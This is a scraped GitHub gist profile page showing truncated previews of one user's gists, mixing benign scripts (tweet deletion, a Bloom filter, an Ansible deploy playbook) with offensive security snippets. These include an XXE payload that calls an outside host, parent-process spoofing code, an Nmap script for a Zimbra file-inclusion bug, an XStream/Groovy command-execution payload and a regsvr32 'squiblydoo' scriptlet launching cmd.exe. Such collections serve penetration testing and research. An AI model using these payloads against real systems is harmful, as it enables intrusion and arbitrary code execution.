Octo Leap JohnTroony

🐙
multitasking
View GitHub Profile
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This script will delete all of the tweets in the specified account.
You may need to hit the "more" button on the bottom of your twitter profile
page every now and then as the script runs, this is due to a bug in twitter.
You will need to get a consumer key and consumer secret token to use this
script, you can do so by registering a twitter application at https://dev.twitter.com/apps
JohnTroony / bloom.py
Created August 4, 2017 16:57 — forked from marcan/bloom.py
Simple Bloom filter implementation in Python 3 (for use with the HIBP password list)
#!/usr/bin/python3
#
# Simple Bloom filter implementation in Python 3
# Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
# Licensed under the terms of the MIT license
#
# Written to be used with the Have I been pwned? password list:
# https://haveibeenpwned.com/passwords
#
# Download the pre-computed filter here (629MB, k=11, false positive p=0.0005):
JohnTroony / main.yaml
Created April 15, 2018 18:32 — forked from kbariotis/main.yaml
Ansible playbook for deploying a Node.js app to DigitalOcean
- name: DO
  hosts: localhost
  vars:
    project_name: "PUT A NAME FOR YOUR PROJECT HERE"
    do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens"
    repository: "PUT YOUR REPOSITORY URL HERE"
  tasks:
    - name: LOCAL | Generate SSH key
      shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N ""
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
    $app = $this->application['handler'];
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
    STARTUPINFO StartupInfo;
    LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
JohnTroony / XXE_payloads
Created September 3, 2018 09:24 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando" reference="../../../.."/>
<owner class="java.lang.ProcessBuilder">
<command>
JohnTroony / Backdoor-Minimalist.sct
Created April 22, 2016 06:00
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Empire"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");